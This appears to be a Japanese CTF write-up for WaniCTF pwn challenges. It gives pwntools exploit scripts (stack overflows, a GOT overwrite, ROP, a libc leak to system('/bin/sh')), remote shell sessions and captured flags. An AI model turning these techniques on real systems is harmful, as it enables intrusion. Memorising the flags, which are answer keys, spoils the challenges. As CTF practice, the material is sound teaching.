[Pwn] netcat
netcat
実行結果
m412u@ubuntu:~/CTF/wanictf/netcat$ nc netcat.wanictf.org 9001
congratulation!
ls -al
total 28
drwxr-xr-x 1 root pwn 4096 Nov 13 07:35 .
drwxr-xr-x 1 root root 4096 Nov 13 07:35 ..
-r-xr-x--- 1 root pwn 8656 Nov 13 07:34 chall
-r--r----- 1 root pwn 33 Nov 13 07:34 flag.txt
-r-xr-x--- 1 root pwn 35 Nov 13 07:34 redir.sh
cat flag.txt
FLAG{netcat-1s-sw1ss-4rmy-kn1fe}
^C
m412u@ubuntu:~/CTF/wanictf/netcat$
var rewrite
exploit
from pwn import *
from sys import argv
from time import sleep
binfile = "./pwn02"
elf = ELF(binfile)
if len(argv) >= 2 and argv[1] == "d":
p = gdb.debug(binfile, '''
break *0x400964
continue
''')
elif len(argv) >= 2 and argv[1] == "r":
p = remote("var.wanictf.org", 9002)
else:
p = process(binfile)
payload = b""
payload += b"A" * 30
payload += p64(0x4006ce)
payload += p64(0x400b43)
payload += p64(0x400b74)
payload += p64(0x400746)
p.recvuntil("What's your name?: ")
p.sendline(payload)
p.interactive()
実行結果
m412u@ubuntu:~/CTF/wanictf/var_rewrite$ python3 exp.py r
[*] '/home/m412u/CTF/wanictf/var_rewrite/pwn02'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
[+] Opening connection to var.wanictf.org on port 9002: Done
[*] Switching to interactive mode
hello AAAAAAAAAAAAAAAAAA?!
target = AAAAAAAA?
***start stack dump***
0x7fff046e0f90: 0x00007fff046e0fb0 <- rsp
0x7fff046e0f98: 0x4141414141410790
0x7fff046e0fa0: 0x4141414141414141
0x7fff046e0fa8: 0x0000003f41414141
0x7fff046e0fb0: 0x4141414141414141 <- rbp
0x7fff046e0fb8: 0x00000000004006ce <- return address
***end stack dump***
$ ls -al
total 28
drwxr-xr-x 1 root pwn 4096 Nov 18 12:43 .
drwxr-xr-x 1 root root 4096 Nov 13 07:35 ..
-r-xr-x--- 1 root pwn 9072 Nov 18 12:43 chall
-r--r----- 1 root pwn 49 Nov 13 07:34 flag.txt
-r-xr-x--- 1 root pwn 35 Nov 13 07:34 redir.sh
$ cat flag.txt
FLAG{1ets-1earn-stack-w1th-b0f-var1ab1e-rewr1te}
$ exit
Segmentation fault (core dumped)
[*] Got EOF while reading in interactive
$
[*] Interrupted
m412u@ubuntu:~/CTF/wanictf/var_rewrite$
[Pwn] binsh address
binsh address
exploit
from pwn import *
from sys import argv
from time import sleep
binfile = "./pwn03"
elf = ELF(binfile)
if len(argv) >= 2 and argv[1] == "d":
p = gdb.debug(binfile, '''
break *0x400964
continue
''')
elif len(argv) >= 2 and argv[1] == "r":
p = remote("var.wanictf.org", 9003)
else:
p = process(binfile)
p.recvuntil("The address of \"input \" is ")
input_addr = eval(p.recv(14))
log.info("input_addr: 0x{:08x}".format(input_addr))
base_addr = input_addr - 0x2010
log.info("base_addr: 0x{:08x}".format(base_addr))
binsh_addr = base_addr + 0x2020
log.info("binsh_addr: 0x{:08x}".format(binsh_addr))
p.sendline(hex(binsh_addr))
sleep(0.5)
p.interactive()
実行結果
m412u@ubuntu:~/CTF/wanictf/binsh_address$ python3 exp.py r
[*] '/home/m412u/CTF/wanictf/binsh_address/pwn03'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] Opening connection to var.wanictf.org on port 9003: Done
[*] input_addr: 0x557885c2b010
[*] base_addr: 0x557885c29000
[*] binsh_addr: 0x557885c2b020
[*] Switching to interactive mode
.
Please input "/bin/sh" address as a hex number: Your input address is 0x557885c2b020.
Congratulation!
$ ls -al
total 32
drwxr-xr-x 1 root pwn 4096 Nov 18 12:44 .
drwxr-xr-x 1 root root 4096 Nov 13 07:35 ..
-r-xr-x--- 1 root pwn 13176 Nov 18 12:44 chall
-r--r----- 1 root pwn 36 Nov 13 07:34 flag.txt
-r-xr-x--- 1 root pwn 35 Nov 13 07:34 redir.sh
$ cat flag.txt
FLAG{cAn-f1nd-str1ng-us1ng-str1ngs}
$
[*] Interrupted
[Pwn] got rewriter
got rewriter
exploit
from pwn import *
from sys import argv
from time import sleep
binfile = "./pwn04"
elf = ELF(binfile)
if len(argv) >= 2 and argv[1] == "d":
p = gdb.debug(binfile, '''
break *0x400964
continue
''')
elif len(argv) >= 2 and argv[1] == "r":
p = remote("var.wanictf.org", 9004)
else:
p = process(binfile)
p.recvuntil(": ")
p.sendline("0x601038")
p.recvuntil(": ")
p.sendline("0x400807")
sleep(0.5)
p.interactive()
実行結果
m412u@ubuntu:~/CTF/wanictf/got_rewriter$ python3 exp.py r
[*] '/home/m412u/CTF/wanictf/got_rewriter/pwn04'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
[+] Opening connection to var.wanictf.org on port 9004: Done
[*] Switching to interactive mode
Your input rewrite value is 0x400807.
*0x601038 <- 0x400807.
congratulation!
$ ls -al
total 28
drwxr-xr-x 1 root pwn 4096 Nov 18 12:45 .
drwxr-xr-x 1 root root 4096 Nov 13 07:35 ..
-r-xr-x--- 1 root pwn 8864 Nov 18 12:43 chall
-r--r----- 1 root pwn 42 Nov 13 07:34 flag.txt
-r-xr-x--- 1 root pwn 35 Nov 13 07:34 redir.sh
$ cat flag.txt
FLAG{we-c4n-f1y-with-gl0b41-0ffset-tab1e}
$
[*] Interrupted
m412u@ubuntu:~/CTF/wanictf/got_rewriter$
ret rewrite
exploit
from pwn import *
from sys import argv
from time import sleep
binfile = "./pwn05"
elf = ELF(binfile)
if len(argv) >= 2 and argv[1] == "d":
p = gdb.debug(binfile, '''
break *0x400964
continue
''')
elif len(argv) >= 2 and argv[1] == "r":
p = remote("var.wanictf.org", 9005)
else:
p = process(binfile)
payload = b""
payload += b"A" * 22
payload += p64(0x400696)
payload += p64(0x400ab3)
payload += p64(0x400ae4)
payload += p64(0x400700)
p.recvuntil("What's your name?: ")
p.sendline(payload)
p.interactive()
実行結果
m412u@ubuntu:~/CTF/wanictf/ret_rewriter$ python3 exp.py r
[*] '/home/m412u/CTF/wanictf/ret_rewriter/pwn05'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
[+] Opening connection to var.wanictf.org on port 9005: Done
[*] Switching to interactive mode
Hello AAAAAAAAAA7!
***start stack dump***
0x7ffe6adafa30: 0x414141414141fb30 <- rsp
0x7ffe6adafa38: 0x0000003741414141
0x7ffe6adafa40: 0x4141414141414141 <- rbp
0x7ffe6adafa48: 0x0000000000400696 <- return address
0x7ffe6adafa50: 0x0000000000400ab3
0x7ffe6adafa58: 0x0000000000400ae4
0x7ffe6adafa60: 0x0000000000400700
***end stack dump***
$ ls -al
total 28
drwxr-xr-x 1 root pwn 4096 Nov 18 12:45 .
drwxr-xr-x 1 root root 4096 Nov 13 07:35 ..
-r-xr-x--- 1 root pwn 9024 Nov 18 12:43 chall
-r--r----- 1 root pwn 49 Nov 13 07:34 flag.txt
-r-xr-x--- 1 root pwn 35 Nov 13 07:34 redir.sh
$ cat flag.txt
FLAG{1earning-how-return-address-w0rks-on-st4ck}
$
[*] Interrupted
m412u@ubuntu:~/CTF/wanictf/ret_rewriter$
[Pwn] rop func call
rop func call
exploit
from pwn import *
from sys import argv
from time import sleep
binfile = "./pwn06"
elf = ELF(binfile)
if len(argv) >= 2 and argv[1] == "d":
p = gdb.debug(binfile, '''
set follow-fork-mode parent
break *0x400811
break *0x400899
continue
''')
elif len(argv) >= 2 and argv[1] == "r":
p = remote("var.wanictf.org", 9006)
else:
p = process(binfile)
payload = b""
payload += b"A" * 22
payload += p64(0x40065e)
payload += p64(0x400a53)
payload += p64(0x601080)
payload += p64(0x4006C0)
p.recvuntil("What's your name?: ")
sleep(0.5)
p.sendline(payload)
p.interactive()
実行結果
m412u@ubuntu:~/CTF/wanictf/rop_func_call$ python3 exp.py r
[*] '/home/m412u/CTF/wanictf/rop_func_call/pwn06'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
[+] Opening connection to var.wanictf.org on port 9006: Done
[*] Switching to interactive mode
hello AAAAAAAAAA7!
***start stack dump***
0x7ffc7ad7fa10: 0x4141414141410000 <- rsp
0x7ffc7ad7fa18: 0x0000003741414141
0x7ffc7ad7fa20: 0x4141414141414141 <- rbp
0x7ffc7ad7fa28: 0x000000000040065e <- return address
0x7ffc7ad7fa30: 0x0000000000400a53
0x7ffc7ad7fa38: 0x0000000000601080
0x7ffc7ad7fa40: 0x00000000004006c0
***end stack dump***
$ ls -al
total 28
drwxr-xr-x 1 root pwn 4096 Nov 18 12:45 .
drwxr-xr-x 1 root root 4096 Nov 13 07:35 ..
-r-xr-x--- 1 root pwn 8992 Nov 18 12:43 chall
-r--r----- 1 root pwn 39 Nov 18 12:43 flag.txt
-r-xr-x--- 1 root pwn 35 Nov 13 07:34 redir.sh
$ cat flag.txt
FLAG{learning-rop-and-x64-system-call}
$
[*] Interrupted
m412u@ubuntu:~/CTF/wanictf/rop_func_call$
[Pwn] one gadget rce
one gadget rce
exploit
from pwn import *
from sys import argv
binary = "./pwn07"
elf = ELF(binary)
libc = elf.libc
PUTS_OFF = 0x80aa0
SYSTEM_OFF = 0x4f550
BINSH_OFF = 0x1b3e1a
if len(argv) >= 2 and argv[1] == "d":
p = gdb.debug(binary, '''
set follow-fork-mode parent
break *0x400811
break *0x400899
continue
''')
elif len(argv) >= 2 and argv[1] == "r":
p = remote("rce.wanictf.org", 9007)
else:
p = process(binary)
payload = b""
payload += b"A" * 22
payload += p64(0x400626)
payload += p64(0x400a13)
payload += p64(0x601020)
payload += p64(0x400650)
payload += p64(0x40085e)
p.recvuntil("What's your name?: ")
p.sendline(payload)
p.recvuntil("***end stack dump***\n\n")
sleep(0.5)
puts_got = u64(p.recv(6)+b"\x00\x00")
log.info("puts_got: 0x{:08x}".format(puts_got))
libc_base = puts_got - PUTS_OFF
log.info("libc_base: 0x{:08x}".format(libc_base))
system_addr = libc_base + SYSTEM_OFF
log.info("system_addr: 0x{:08x}".format(system_addr))
binsh_addr = libc_base + BINSH_OFF
log.info("binsh_addr: 0x{:08x}".format(binsh_addr))
payload2 = b""
payload2 += b"A" * 22
payload2 += p64(0x400626)
payload2 += p64(0x400a13)
payload2 += p64(binsh_addr)
payload2 += p64(system_addr)
sleep(1)
p.recvuntil("What's your name?: ")
p.sendline(payload2)
p.recvuntil("***end stack dump***\n\n")
p.interactive()
実行結果
m412u@ubuntu:~/CTF/wanictf/one_gadget_rce$ python3 exp.py r
[*] '/home/m412u/CTF/wanictf/one_gadget_rce/pwn07'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
[*] '/usr/lib/x86_64-linux-gnu/libc-2.31.so'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] Opening connection to rce.wanictf.org on port 9007: Done
[*] puts_got: 0x7f2d52157aa0
[*] libc_base: 0x7f2d520d7000
[*] system_addr: 0x7f2d52126550
[*] binsh_addr: 0x7f2d5228ae1a
[*] Switching to interactive mode
$ ls -al
total 28
drwxr-xr-x 1 root pwn 4096 Nov 18 12:45 .
drwxr-xr-x 1 root root 4096 Nov 13 07:35 ..
-r-xr-x--- 1 root pwn 8888 Nov 18 12:43 chall
-r--r----- 1 root pwn 43 Nov 18 12:43 flag.txt
-r-xr-x--- 1 root pwn 35 Nov 13 07:34 redir.sh
$ cat flag.txt
FLAG{mem0ry-1eak-4nd-0ne-gadget-rem0te-ce}
$
[*] Interrupted
m412u@ubuntu:~/CTF/wanictf/one_gadget_rce$
